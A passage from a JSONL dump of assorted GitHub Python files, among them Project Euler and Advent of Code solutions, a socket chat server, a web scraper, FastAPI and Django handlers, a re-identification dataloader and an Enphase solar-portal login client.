for reverseList\n reversed_head = reverseList(test_head)\n print(listnode_to_list(reversed_head))\n","repo_name":"ALeftHanded/blog-doc","sub_path":"Algorithm/AlgorithmPython/ListNodeQuestion/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17683189119","text":"import sympy\nfrom eulerlib import primes\nimport itertools\nfrom collections import Counter\n\n\ndef main():\n\n x = prime_pair_sets(10000, 5)\n print(x)\n\n\ndef prime_pair_sets(n, set_len):\n prime_list = primes(n)\n len_prime_list = len(prime_list)\n prime_pairs = {}\n\n for i in range(0, len_prime_list, 1):\n counterparts = []\n for j in range(i + 1, len_prime_list, 1):\n if is_prime_pair((prime_list[i], prime_list[j])):\n counterparts.append(prime_list[j])\n if len(counterparts) > 1:\n prime_pairs[prime_list[i]] = counterparts\n\n results = [[digit] for digit in prime_list]\n\n while set_len > 1:\n temp_results = []\n for result in results:\n potential_pairs = prime_pairs.get(result[-1])\n if potential_pairs:\n for k in range(0, len(result) - 1, 1):\n another_potential_pair = prime_pairs.get(result[k])\n potential_pairs = list((Counter(potential_pairs) & Counter(another_potential_pair)).elements())\n if potential_pairs:\n for potential_pair in potential_pairs:\n temp_results.append(result + [potential_pair])\n results = temp_results\n set_len -= 1\n\n return min([sum(digits) for digits in results])\n\n\ndef is_prime_pair(n_pair):\n return sympy.isprime(int(str(n_pair[0]) + str(n_pair[1]))) and sympy.isprime(int(str(n_pair[1]) + str(n_pair[0])))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"ninomarlou/project-euler","sub_path":"60-prime-pair-sets.py","file_name":"60-prime-pair-sets.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10892321871","text":"import socket # https://docs.python.org/3/library/socket.html\nimport threading # https://docs.python.org/3/library/threading.html\nimport sys\n\n# AF_INET: IPv4\n# SOCK_STREAM: TCP, SOCK_DGRAM: UDP\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\naddr = sys.argv[1]\nport = 9999\nprint('addr: ' + addr + ':' + str(port))\nsock.bind((addr, port))\n\nsock.listen(1)\n\nconnections = []\n\ndef handler(c, a):\n global connections\n while True:\n data = c.recv(1024) # str\n print('get data: ' + str(data))\n for connection in connections:\n pass\n #connection.send(bytes(data))\n if not data:\n connections.remove(c)\n c.close()\n break\n\ndef input_handler(c, a):\n global connections\n while True:\n for connection in connections:\n connection.send(bytes(input(\"\") + '\\r\\n', 'utf-8'))\n\nwhile True:\n connection, client_address = sock.accept()\n cThread = threading.Thread(target=handler, args=(connection, client_address))\n cThread.daemon = True\n cThread.start()\n connections.append(connection)\n print(connections)\n\n sThread = threading.Thread(target=input_handler, args=(connection, client_address))\n sThread.daemon = True\n sThread.start()\n\n\"\"\"\n# Server can send msg to all client. Client can send msg to server.\n\n# Server\npython server-a20180413.py 127.0.0.1\n# Client\ntelnet 127.0.0.1 9999\n\"\"\"\n","repo_name":"lovenery/DPDPP","sub_path":"server-a20180413.py","file_name":"server-a20180413.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15412495560","text":"import requests as re\nimport json\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n \ndf = re.get(\"https://calendar.zoznam.sk/sunset-sk.php?city=3058531\")\nsoup = BeautifulSoup(df.text, 'html.parser')\n\nmydivs = soup.findAll(\"div\", {\"class\": \"calendar\"})\n\nyear = {}\nnumber_of_month = 0\n\nfor div in mydivs:\n\n days_in_month = 0\n number_of_month += 1\n months = {}\n \n month = div.h2.text\n tds = div.find_all(\"span\", {\"class\": \"number\"})\n days = {}\n \n for td in tds:\n day = td.parent.text\n days_in_month +=1\n # sun_set = day.rsplit('Západ:')\n # sun_rise = day.split('Vychod:')\n days[days_in_month] = day\n \n\n months[\"number of month\"] = number_of_month\n months[\"days in month\"] = days_in_month\n months[\"days data\"] = days\n year[month] = months\n\n\n\nwith open('output.json', 'w') as json_file:\n json.dump(year, json_file)\n\n","repo_name":"norbertbago/data_mini_projects","sub_path":"sun-rise_sun-set_stat2021/project_files/data_scaping.py","file_name":"data_scaping.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9188169210","text":"from fastapi import HTTPException, status\r\n\r\n\r\nfrom app.v1.model.location_model import Location as LocationModel\r\nfrom app.v1.model.pets_model import Pets as PetsModel\r\nfrom app.v1.schema import location_schema\r\n\r\n\r\ndef create_location(location: location_schema.LocationBase):\r\n get_location = LocationModel.filter(LocationModel.name_city_location == location.name_city_location).first()\r\n if get_location:\r\n if get_location.name_city_location == location.name_city_location:\r\n msg = \"Ciudad ya existente\"\r\n raise HTTPException(\r\n status_code=status.HTTP_400_BAD_REQUEST,\r\n detail=msg\r\n )\r\n\r\n db_location = LocationModel(\r\n name_city_location = location.name_city_location,\r\n longitude_location = location.longitude_location,\r\n latitude_location = location.latitude_location\r\n )\r\n\r\n db_location.save()\r\n\r\n return location_schema.Location(\r\n id = db_location.id,\r\n name_city_location = db_location.name_city_location,\r\n longitude_location = db_location.longitude_location,\r\n latitude_location = db_location.latitude_location\r\n )\r\n\r\ndef get_location(id: int):\r\n location = LocationModel.filter(LocationModel.id == id).first()\r\n if not location:\r\n raise HTTPException(\r\n status_code=status.HTTP_404_NOT_FOUND,\r\n detail=\"Ubicacion no encontrada\"\r\n )\r\n\r\n return location_schema.Location(\r\n id = location.id,\r\n name_city_location= location.name_city_location,\r\n latitude_location= location.latitude_location,\r\n longitude_location= location.longitude_location\r\n )\r\n\r\ndef get_list_locations():\r\n list_location = []\r\n for i in range(0, 100):\r\n location = LocationModel.filter((LocationModel.id == i)).first()\r\n if location is None:\r\n i += 1\r\n else:\r\n list_location.append(location_schema.Location(\r\n id = location.id,\r\n name_city_location= location.name_city_location,\r\n latitude_location= location.latitude_location,\r\n longitude_location= location.longitude_location\r\n ))\r\n return list_location\r\n\r\n\r\ndef delete_location(location_id: int):\r\n location = LocationModel.filter((LocationModel.id == location_id)).first()\r\n pets = PetsModel.filter((PetsModel.location == location_id)).first()\r\n\r\n if pets is not None:\r\n raise HTTPException(\r\n status_code= status.HTTP_400_BAD_REQUEST,\r\n detail= \"Ubicacion no puede ser eliminada, se encuentra en uso\"\r\n )\r\n\r\n if location is None:\r\n raise HTTPException(\r\n status_code= status.HTTP_400_BAD_REQUEST,\r\n detail= \"Ubicacion no encontrada\"\r\n )\r\n\r\n location.delete_instance()\r\n\r\n\r\n\r\n","repo_name":"Juanma1023/pet_adoption_api","sub_path":"App/v1/service/location_service.py","file_name":"location_service.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28409935430","text":"from __future__ import print_function\nfrom db_util import Symptom, RelatedSymptom, Disease, RelatedDisease\n\n\ndef select_related_symptoms(symptom_ids):\n ''' select all sypmtoms related to given symptom_ids\n Args:\n symptom_ids: list of symptom ids that needs to query, e.g. [1, 2]\n Return:\n related_symptoms: list of (symptom_name, rank) pairs\n '''\n symptom_ids = sorted(symptom_ids)\n symptom_ids_key = '|'.join(symptom_ids)\n query_related_symptoms = Symptom\\\n .select(Symptom, RelatedSymptom.rank) \\\n .join(RelatedSymptom, on=(RelatedSymptom.related_symptom_id == Symptom.id)) \\\n .where(RelatedSymptom.main_symptom_id == symptom_ids_key) \\\n .order_by(RelatedSymptom.rank.desc())\n\n related_symptoms = []\n for r in query_related_symptoms:\n related_symptoms.append((r.name, r.related_symptom[0].rank))\n # related_symptoms.append(r.name)\n return related_symptoms\n\n\ndef select_related_diseases(symptom_id):\n ''' select all diseases related to given symptom_id\n Args:\n symptom_id: integer, the symptom_id that needs to be queried\n Returns:\n related_diseases:\n '''\n query_related_diseases = Disease\\\n .select(Disease, RelatedDisease) \\\n .join(RelatedDisease, on=(RelatedDisease.related_disease_id == Disease.id)) \\\n .where(RelatedDisease.main_symptom_id == symptom_id)\n\n related_diseases = []\n for r in query_related_diseases:\n # related_diseases.append((r.title, r.text, r.link))\n related_diseases.append((r.title, r.text, r.link, r.is_emergency, r.thumbnail))\n return related_diseases\n\n\ndef select(symptom_names=['Dizziness']):\n\n # 1. get sypmtom_ids according to given sypmtom_names, could use reverse index\n query_symptom_ids = Symptom.select().where(Symptom.name << symptom_names)\n symptom_ids = [str(s.id) for s in query_symptom_ids]\n\n # 2. select related sypmtoms\n ret_symptoms = select_related_symptoms(symptom_ids)\n\n all_related_diseases = []\n for symptom_id in symptom_ids:\n related_diseases = select_related_diseases(symptom_id)\n all_related_diseases.append(related_diseases)\n\n # 3. get the intersection of given diseases\n ret_diseases = set(all_related_diseases[0])\n for s in all_related_diseases[1:]:\n ret_diseases = ret_diseases.intersection(s)\n ret_diseases = list(ret_diseases)\n return ret_symptoms, ret_diseases\n\n\ndef main():\n symptom_names = ['Dizziness', 'Shortness of Breath']\n # symptom_names = ['Dizziness']\n ret = select(symptom_names)\n print('related_symptoms:', len(ret[0]))\n print(ret[0])\n print('\\n----------------------------\\n')\n print('related_diseases:', len(ret[1]))\n print(ret[1])\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yinchuandong/healthline","sub_path":"data_query.py","file_name":"data_query.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43655077252","text":"from borameboard.models import Board\nfrom django.shortcuts import render,redirect\nfrom .models import Board\nfrom .forms import RegistForm\nfrom django.core.paginator import Paginator\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404\nfrom .forms import *\nfrom .models import *\nfrom django.contrib.auth.models import User\n\ndef index(request):\n page = request.GET.get('page', '1') # 페이지 파라미터 얻기, 없으면 1\n board_list = Board.objects.order_by('-id')\n\n # 페이징 처리\n paginator = Paginator(board_list, 10) # 페이지당 10개씩 보여주기\n page_obj = paginator.get_page(page) # page에 해당하는 페이징 객체 생성\n user = request.user\n context = {'board_list': page_obj,\n 'user':user\n } # 페이징 객체(page_obj) 전달\n return render(request, 'borameboard/index.html', context)\n\n\n\ndef regist(request):\n if request.method == 'POST':\n form = RegistForm(request.POST)\n if form.is_valid():\n post = form.save()\n return redirect('borame_board:index')\n else:\n form = RegistForm()\n context = {'form': form,\n 'user': request.user}\n return render(request, 'borameboard/regist_form.html', context)\n\ndef detail(request, pk):\n board_list = get_object_or_404(Board, id=pk)\n context = {'board_list': board_list}\n return render(request, 'borameboard/detail.html', context)\n\ndef edit(request, pk):\n post = get_object_or_404(Board, id=pk)\n if request.method == 'POST':\n form = RegistForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save()\n return redirect('borame_board:index')\n else:\n form = RegistForm(instance=post)\n context = {'form': form,}\n return render(request, 'borameboard/edit_form.html', context)\n\ndef delete(request, pk):\n post = get_object_or_404(Board, id=pk)\n post.delete()\n return redirect('borame_board:index')","repo_name":"jckim22/django_board","sub_path":"borameboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75329166820","text":"#-*- coding: utf-8 -*\nclass Alumno:\n def __init__(self, matricula, nombre, apellido, correo, estatus):\n self.numero_matricula = matricula\n self.nombre = nombre\n self.apellido = apellido\n self.correo_electronico = correo\n self.estatus_inscrito = estatus\n\nclass Modulo:\n def __init__(self, fecha_inicio, fecha_fin):\n self.listado_alumnos = [{\n 'numero_matricula' : 1,\n 'nombre' : 'Fernando',\n 'apellido' : 'Merino',\n 'correo_electronico' : 'fernando@correo.es',\n 'estatus_inscrito' : True\n },\n {\n 'numero_matricula' : 2,\n 'nombre' : 'Rosa',\n 'apellido' : 'Artero',\n 'correo_electronico' : 'isabel@correo.es',\n 'estatus_inscrito' : True\n },\n {\n 'numero_matricula' : 3,\n 'nombre' : 'Javier',\n 'apellido' : 'Ugarte',\n 'correo_electronico' : 'jugarte@correo.es',\n 'estatus_inscrito' : True\n },\n {\n 'numero_matricula' : 4,\n 'nombre' : 'María',\n 'apellido' : 'López',\n 'correo_electronico' : 'mlopez@correo.es',\n 'estatus_inscrito' : True\n },\n {\n 'numero_matricula' : 5,\n 'nombre' : 'José',\n 'apellido' : 'Navarro',\n 'correo_electronico' : 'josenav@correo.es',\n 'estatus_inscrito' : True\n }\n ]\n self.fecha_inicio = fecha_inicio\n self.fecha_fin = fecha_fin\n\n def agregar_alumno(self):\n matricula = self.listado_alumnos[len(self.listado_alumnos) - 1]['numero_matricula'] + 1\n nombre = raw_input('Escribe un nombre: ')\n apellido = raw_input('Escribe un apellido: ')\n correo = raw_input('Escribe un e-mail: ')\n alumno = {\n 'numero_matricula' : matricula,\n 'nombre' : nombre,\n 'apellido' : apellido,\n 'correo_electronico' : correo,\n 'estatus_inscrito' : True\n }\n self.listado_alumnos.append(alumno)\n\n def buscar_alumno(self, matricula):\n if (any(map(lambda person : person['numero_matricula'] == matricula, self.listado_alumnos))):\n alumno = filter(lambda person : person['numero_matricula'] == matricula, self.listado_alumnos)[0]\n print('Resultado:\\nNombre: %s\\nApellido: %s\\nE-mail: %s' %(alumno['nombre'], alumno['apellido'], alumno['correo_electronico']))\n else:\n print('El alumno no está en el listado')\n\n def mostrar_inscritos(self):\n list = 'Alumnos inscritos:\\n\\nNº matrícula, Nombre, Apellido, E-mail\\n'\n for person in self.listado_alumnos:\n if (person['estatus_inscrito']):\n list += '%s, %s, %s, %s\\n' %(person['numero_matricula'], person['nombre'], person['apellido'], person['correo_electronico'])\n print(list)\n\nprebootcamp = Modulo('05/10/2018', '23/11/2018')\n\nwhile True:\n option = input('Opciones:\\n(1) Agregar un alumno\\n(2) Ver todos los alumnos enrolados\\n(3) Buscar un alumno por matrícula\\n')\n\n if option == 1:\n prebootcamp.agregar_alumno()\n elif option == 2:\n prebootcamp.mostrar_inscritos()\n elif option == 3:\n matricula = input('Introduce el número de matrícula: ')\n prebootcamp.buscar_alumno(matricula)\n else:\n print('Opción no válida. Prueba de nuevo.')","repo_name":"Ferveloper/python-exercises","sub_path":"KC_EJ33.py","file_name":"KC_EJ33.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26310535690","text":"from collections import Counter\nimport numpy as np\n\nwith open('in/21.txt') as f:\n p0, p1 = [int(line.split()[-1]) for line in f.read().splitlines()]\n\n\n# Part 1\n\npos = [p0, p1]\nscores = [0, 0]\ndie = 0\nplayer = 0\nwhile True:\n pos[player] += 3 * (die % 100 + 1) + 3\n pos[player] %= 10\n if pos[player] == 0:\n pos[player] = 10\n scores[player] += pos[player]\n die += 3\n if scores[player] >= 1000:\n print(scores[1 - player] * die)\n break\n player = 1 - player\n\n\n# Part 2\n\npos_count = np.array([0, 0, 0, 1, 3, 6, 7, 6, 3, 1])\npos_score = np.array([i if i > 0 else 10 for i in range(10)])\n\npos = [p0 % 10, p1 % 10]\nscores = [0, 0]\nplayer = 0\nwins = [0, 0]\n# simul[pos, score] = count\nsimul = [Counter([(pos[0], 0)]), Counter([(pos[1], 0)])]\n\nwhile simul[0] and simul[1]:\n new_simul = Counter()\n opp_total = 0\n for c in simul[1 - player].values():\n opp_total += c\n for (p, s), c in simul[player].items():\n new_counts = c * np.roll(pos_count, p)\n new_scores = s + pos_score\n for i in range(10):\n if new_counts[i] == 0:\n continue\n if new_scores[i] >= 21:\n wins[player] += new_counts[i] * opp_total\n else:\n new_simul[(i, new_scores[i])] += new_counts[i]\n simul[player] = new_simul\n player = 1 - player\n\nprint(max(wins))\n","repo_name":"BradonZhang/advent-of-code-2021","sub_path":"src/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"20528706212","text":"import data.img_transforms as T\nimport data.spatial_transforms as ST\nimport data.temporal_transforms as TT\nfrom torch.utils.data import DataLoader\nfrom data.dataloader import DataLoaderX\nfrom data.dataset_loader import ImageDataset, VideoDataset\nfrom data.samplers import DistributedRandomIdentitySampler, DistributedInferenceSampler\nfrom data.datasets.ltcc import LTCC\nfrom data.datasets.prcc import PRCC\nfrom data.datasets.last import LaST\nfrom data.datasets.ccvid import CCVID\nfrom data.datasets.deepchange import DeepChange\nfrom data.datasets.vcclothes import VCClothes, VCClothesSameClothes, VCClothesClothesChanging\n\n\n__factory = {\n 'ltcc': LTCC,\n 'prcc': PRCC,\n 'vcclothes': VCClothes,\n 'vcclothes_sc': VCClothesSameClothes,\n 'vcclothes_cc': VCClothesClothesChanging,\n 'last': LaST,\n 'ccvid': CCVID,\n 'deepchange': DeepChange,\n}\n\nVID_DATASET = ['ccvid']\n\n\ndef get_names():\n return list(__factory.keys())\n\n\ndef build_dataset(config):\n if config.DATA.DATASET not in __factory.keys():\n raise KeyError(\"Invalid dataset, got '{}', but expected to be one of {}\".format(name, __factory.keys()))\n\n if config.DATA.DATASET in VID_DATASET:\n dataset = __factory[config.DATA.DATASET](root=config.DATA.ROOT, \n sampling_step=config.DATA.SAMPLING_STEP,\n seq_len=config.AUG.SEQ_LEN, \n stride=config.AUG.SAMPLING_STRIDE)\n else:\n dataset = __factory[config.DATA.DATASET](root=config.DATA.ROOT)\n\n return dataset\n\n\ndef build_img_transforms(config):\n transform_train = T.Compose([\n T.Resize((config.DATA.HEIGHT, config.DATA.WIDTH)),\n T.RandomCroping(p=config.AUG.RC_PROB),\n T.RandomHorizontalFlip(p=config.AUG.RF_PROB),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n T.RandomErasing(probability=config.AUG.RE_PROB)\n ])\n transform_test = T.Compose([\n T.Resize((config.DATA.HEIGHT, config.DATA.WIDTH)),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n return transform_train, transform_test\n\n\ndef build_vid_transforms(config):\n spatial_transform_train = ST.Compose([\n ST.Scale((config.DATA.HEIGHT, config.DATA.WIDTH), interpolation=3),\n ST.RandomHorizontalFlip(),\n ST.ToTensor(),\n ST.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ST.RandomErasing(height=config.DATA.HEIGHT, width=config.DATA.WIDTH, probability=config.AUG.RE_PROB)\n ])\n spatial_transform_test = ST.Compose([\n ST.Scale((config.DATA.HEIGHT, config.DATA.WIDTH), interpolation=3),\n ST.ToTensor(),\n ST.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n if config.AUG.TEMPORAL_SAMPLING_MODE == 'tsn':\n temporal_transform_train = TT.TemporalDivisionCrop(size=config.AUG.SEQ_LEN)\n elif config.AUG.TEMPORAL_SAMPLING_MODE == 'stride':\n temporal_transform_train = TT.TemporalRandomCrop(size=config.AUG.SEQ_LEN, \n stride=config.AUG.SAMPLING_STRIDE)\n else:\n raise KeyError(\"Invalid temporal sempling mode '{}'\".format(config.AUG.TEMPORAL_SAMPLING_MODE))\n\n temporal_transform_test = None\n\n return spatial_transform_train, spatial_transform_test, temporal_transform_train, temporal_transform_test\n\n\ndef build_dataloader(config):\n dataset = build_dataset(config)\n # video dataset\n if config.DATA.DATASET in VID_DATASET:\n spatial_transform_train, spatial_transform_test, temporal_transform_train, temporal_transform_test = build_vid_transforms(config)\n\n if config.DATA.DENSE_SAMPLING:\n train_sampler = DistributedRandomIdentitySampler(dataset.train_dense, \n num_instances=config.DATA.NUM_INSTANCES, \n seed=config.SEED)\n # split each original training video into a series of short videos and sample one clip for each short video during training\n trainloader = DataLoaderX(\n dataset=VideoDataset(dataset.train_dense, spatial_transform_train, temporal_transform_train),\n sampler=train_sampler,\n batch_size=config.DATA.TRAIN_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=True)\n else:\n train_sampler = DistributedRandomIdentitySampler(dataset.train, \n num_instances=config.DATA.NUM_INSTANCES, \n seed=config.SEED)\n # sample one clip for each original training video during training\n trainloader = DataLoaderX(\n dataset=VideoDataset(dataset.train, spatial_transform_train, temporal_transform_train),\n sampler=train_sampler,\n batch_size=config.DATA.TRAIN_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=True)\n \n # split each original test video into a series of clips and use the averaged feature of all clips as its representation\n queryloader = DataLoaderX(\n dataset=VideoDataset(dataset.recombined_query, spatial_transform_test, temporal_transform_test),\n sampler=DistributedInferenceSampler(dataset.recombined_query),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n galleryloader = DataLoaderX(\n dataset=VideoDataset(dataset.recombined_gallery, spatial_transform_test, temporal_transform_test),\n sampler=DistributedInferenceSampler(dataset.recombined_gallery),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n\n return trainloader, queryloader, galleryloader, dataset, train_sampler\n # image dataset\n else:\n transform_train, transform_test = build_img_transforms(config)\n train_sampler = DistributedRandomIdentitySampler(dataset.train, \n num_instances=config.DATA.NUM_INSTANCES, \n seed=config.SEED)\n trainloader = DataLoaderX(dataset=ImageDataset(dataset.train, transform=transform_train),\n sampler=train_sampler,\n batch_size=config.DATA.TRAIN_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=True)\n\n galleryloader = DataLoaderX(dataset=ImageDataset(dataset.gallery, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.gallery),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n\n if config.DATA.DATASET == 'prcc':\n queryloader_same = DataLoaderX(dataset=ImageDataset(dataset.query_same, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.query_same),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n queryloader_diff = DataLoaderX(dataset=ImageDataset(dataset.query_diff, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.query_diff),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n\n return trainloader, queryloader_same, queryloader_diff, galleryloader, dataset, train_sampler\n else:\n queryloader = DataLoaderX(dataset=ImageDataset(dataset.query, transform=transform_test),\n sampler=DistributedInferenceSampler(dataset.query),\n batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n pin_memory=True, drop_last=False, shuffle=False)\n\n return trainloader, queryloader, galleryloader, dataset, train_sampler\n\n \n\n \n","repo_name":"guxinqian/Simple-CCReID","sub_path":"data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"35"} +{"seq_id":"1121666211","text":"from typing import Any, List\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.utils import IntegrityError\nfrom django.http import HttpRequest, HttpResponse, JsonResponse, response\nfrom ninja import Router\nfrom ninja.errors import HttpError\n\nfrom comment.API.V1.schemas import (\n CommentsResponse,\n CreateCommentRequest,\n CreateCommentResponse,\n DeleteCommentRequest,\n DeleteCommentResponse,\n UpdateCommentRequest,\n UpdateCommentResponse,\n)\nfrom comment.models import Comment\nfrom comment.services import (\n create_comment,\n delete_comment,\n read_comments,\n read_replys,\n read_user_comments,\n update_comment,\n)\n\nrouter = Router(tags=[\"comment\"])\n\n\n@router.get(\"/read_user/{user}\", response={200: List[CommentsResponse]})\ndef comment_read_user(request: HttpRequest, user: int) -> List[Comment]:\n comments = read_user_comments(user)\n if len(comments) == 0:\n raise HttpError(404, \"Comment is None\")\n return comments\n\n\n@router.get(\"/read/{repo}\", response={200: List[CommentsResponse]})\ndef comment_read(request: HttpRequest, repo: str) -> List[Comment]:\n comments = read_comments(int(repo))\n if len(comments) == 0:\n raise HttpError(404, \"Comment is None\")\n return comments\n\n\n@router.get(\"/read_reply/{repo}\", response={200: List[CommentsResponse]})\ndef comment_reply_read(request: HttpRequest, repo: str) -> List[Comment]:\n replys = read_replys(int(repo))\n if len(replys) == 0:\n raise HttpError(404, \"Comment is None\")\n return replys\n\n\n@login_required(login_url=\"/accounts/login\")\n@router.post(\"/create/\", response={201: CreateCommentResponse})\ndef comment_create(\n request: HttpRequest, create_comment_request: CreateCommentRequest\n) -> dict:\n user_id = request.user.id\n try:\n create_comment(\n user_id,\n create_comment_request,\n )\n except IntegrityError:\n raise HttpError(422, \"Empty Space\")\n return JsonResponse({\"result\": \"success\"}, status=201)\n\n\n@login_required(login_url=\"/accounts/login\")\n@router.put(\"/update\", response={201: UpdateCommentResponse})\ndef comment_update(\n request: HttpRequest, update_comment_request: UpdateCommentRequest\n) -> dict:\n try:\n update_comment(\n request.user,\n update_comment_request.COMMENT_ID,\n update_comment_request.CONTENT,\n )\n except Comment.DoesNotExist:\n raise HttpError(404, \"Comment is None\")\n return JsonResponse({\"result\": \"success\"}, status=201)\n\n\n@login_required(login_url=\"/accounts/login\")\n@router.delete(\"/delete\", response={201: DeleteCommentResponse})\ndef comment_delete(\n request: HttpRequest, delete_comment_request: DeleteCommentRequest\n) -> dict:\n try:\n delete_comment(request.user, delete_comment_request.COMMENT_ID)\n except Comment.DoesNotExist:\n raise HttpError(404, \"Comment is None\")\n return JsonResponse({\"result\": \"success\"}, status=201)\n","repo_name":"mungnpang/RR","sub_path":"comment/API/V1/comment_router.py","file_name":"comment_router.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25019483640","text":"import matplotlib.pyplot as plt\nfrom matplotlib.ticker import FormatStrFormatter\nimport numpy as np\nimport pandas as pd\nimport argparse\n\n\ndef plot_pvals(df, plane, inputDir):\n fig, ax = plt.subplots()\n start, end = ax.get_xlim()\n ax.xaxis.set_ticks(np.arange(start, end, 0.1))\n\n key = 'pvals_' + plane\n plt.xticks(np.arange(0.0, 1.1, 0.1))\n ax.hist(df[key], bins=50, density=False)\n plt.xlabel(\"p-value distribution from chi2 fit in\" + plane + \"plane for extracted candidates\")\n plt.ylabel(\"Frequency\")\n plt.savefig(inputDir + \"/p_value_distribution_\" + plane + \".png\", dpi=300)\n\n\nparser = argparse.ArgumentParser(description='extract track candidates')\nparser.add_argument('-i', '--input', help='input directory path')\nargs = parser.parse_args()\ninputDir = args.input\n\ndf = pd.read_csv(inputDir + \"/iteration_1/candidates/pvals.csv\")\n\nplot_pvals(df, 'xy', inputDir)\nplot_pvals(df, 'zr', inputDir)","repo_name":"nishalad95/GNN-track-finding","sub_path":"src/extract/p_value_distribution.py","file_name":"p_value_distribution.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14392584868","text":"def replace_str_index(text,index=0,replacement=''):\n return '%s%s%s'%(text[:index],replacement,text[index+1:])\n\ndef deleteDigit(n):\n numStr = str(n)\n currentMax = 0\n for digit in range(len(numStr)):\n newNum = int(replace_str_index(numStr,digit))\n if newNum > currentMax:\n currentMax = newNum\n return currentMax\n \n","repo_name":"TheBroMoe/codeSignal","sub_path":"Arcade/intro/deleteDigit.py","file_name":"deleteDigit.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"33418572774","text":"from datetime import datetime\nfrom datetime import timedelta\nimport requests\nimport re\nimport os\nimport pickle\n\nclass Client():\n URL = 'https://enlighten.enphaseenergy.com'\n\n def __init__(self, utc_offset=-5, time_step=15,\n persist_session=False, session_file='enphase_cookie.p', \n persist_config=False, config_file='enphase_config.p'):\n self.system_id = None\n self.csrf_token = ''\n self.cookies = None\n self.power_data = {}\n self.raw_data = {}\n \n self.persist_session = persist_session\n self.cookie_file = session_file\n self.persist_config = persist_config\n self.config_file = config_file\n \n # NOTE: our time axis should start at local solar midnight\n # and have units of minutes past UTC midnight\n self.utc_offset = utc_offset\n self.time_step = time_step\n self.minute_axis = _range(-utc_offset*60, (24-utc_offset)*60, time_step)\n \n if not self.load_session():\n return\n if not self.load_config():\n self.fetch_config()\n \n def login(self, username, password, force=False):\n if force:\n self.cookies = None\n if self.cookies is not None:\n return\n self.fetch_csrf()\n self.post_login(username, password)\n self.save_session()\n self.fetch_config()\n\n def fetch_csrf(self):\n resp = requests.get(self.URL)\n csrf_pattern = 'name=\"authenticity_token\" value=\"(\\S+)\"'\n csrf_match = re.search(csrf_pattern, resp.text)\n if csrf_match is None:\n return\n self.csrf_token = csrf_match[1]\n\n def post_login(self, username, password):\n path = '/login/login'\n params = {\n 'user[email]': username,\n 'user[password]': password,\n 'authenticity_token': self.csrf_token,\n 'commit': 'Sign In',\n 'utf8': '✓'\n }\n headers = {\n 'origin': 'https://enlighten.enphaseenergy.com',\n 'referer': 'https://enlighten.enphaseenergy.com/'\n }\n resp = requests.post(self.URL+path, data=params, headers=headers, allow_redirects=False)\n self.cookies = resp.cookies\n \n def save_session(self):\n if not self.persist_session:\n return\n if not os.path.exists('tmp'):\n os.mkdir('tmp')\n pickle.dump( self.cookies, open( self.cookie_file, \"wb\" ) )\n \n def load_session(self):\n if not 